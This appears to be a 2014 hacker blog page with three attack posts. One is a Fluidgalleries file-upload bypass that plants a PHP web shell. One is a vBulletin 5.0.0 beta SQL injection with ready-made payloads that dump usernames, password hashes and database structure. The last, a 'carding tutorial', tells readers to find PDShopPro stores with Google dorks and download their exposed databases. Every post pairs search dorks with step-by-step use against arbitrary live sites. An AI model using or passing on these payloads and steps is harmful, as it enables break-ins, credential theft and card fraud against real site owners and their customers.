Monday, 30 June 2014

Fluidgalleries Photo Upload Remote - File Upload Vulnerability

Dorks:
inurl:"fluidgalleries/dat/info.dat"
 inurl:"/fluidgalleries/php/"
Exploit:
http://localhost/[path]/fluidgalleries/php/photo-upload.php
*Use Firefox...

Use Live HTTP Headers... Then go to here:
http://localhost/[path]/fluidgalleries/php/photo-upload.php

1.Click the Choose File button Then select a file [shell.php.jpg] 

2.Then click on the upload button.

3. Now using Live HTTP Headers uploaded files to PHP change [shell.php]

4. Then go to this page :
http://localhost/[path]/fluidgalleries/photos/ [Random number+shell.php]

Example: 1NEXUS.php

.. Video proof exploits :
http://m-h-a-c-k-e-r.persiangig.com/Black.Idc-Team/fluidgalleriesExploit/fluidgalleriesExploit.swf

Saturday, 28 June 2014

vBulletin 5.0.0 All Beta Release SQL Injection Exploit 0day



Dork:
Powered by vBulletin™ Version 5.0.0 Beta
Stuffs Needed:
Firefox + HTTP Live Header 
1. Choose any forums... Create an account then activate it.

2. Find any posts... But i think you should find admin's post... 

3. Open HTTP Live Header then click on "LIKE"...

4. Then go on Send POST Content and use below Query , just add the Below Query after "noteid=somenumber".

Query:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
*The Above SQLi command will fetch out the first record from user table(username/password). 

*See The username and pass in encrypted get the salt to and decrypt it i wont show decrypting, use your brain :)

Other SQLi Syntaxes:
Version():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

User():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

Database():
) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

 Database Print:
 ) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338

 Table Count:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

 Print Tables:
) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

Columns Of Selected Tables:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

Fetch Out Data:
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x 7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338 

NEXUS 

Thursday, 26 June 2014

Carding Tutorial - PDShopPro Shopping Cart



Dork:
allinurl:/shop/category.asp?catid=

Steps:
1- Copy and paste the dork on Google
2- Choose any site
3- For example, your site is 
 www.example.com/shop/category.asp?catid=2
4- Remove /shop/category.asp?catid=2 and replace it with /admin/dbsetup.asp and you will see some thing like this.

 

5- If you get something like this, that's mean the site is vulnerable.
6- Now, continue our next step by replacing /admin/dbsetup.asp with /data/pdshoppro.mdb
7- You will be prompted to save the file/open it.

  

8- Click save file and open it with Microsoft Access or any other XLS Reader

 


 Watch the Video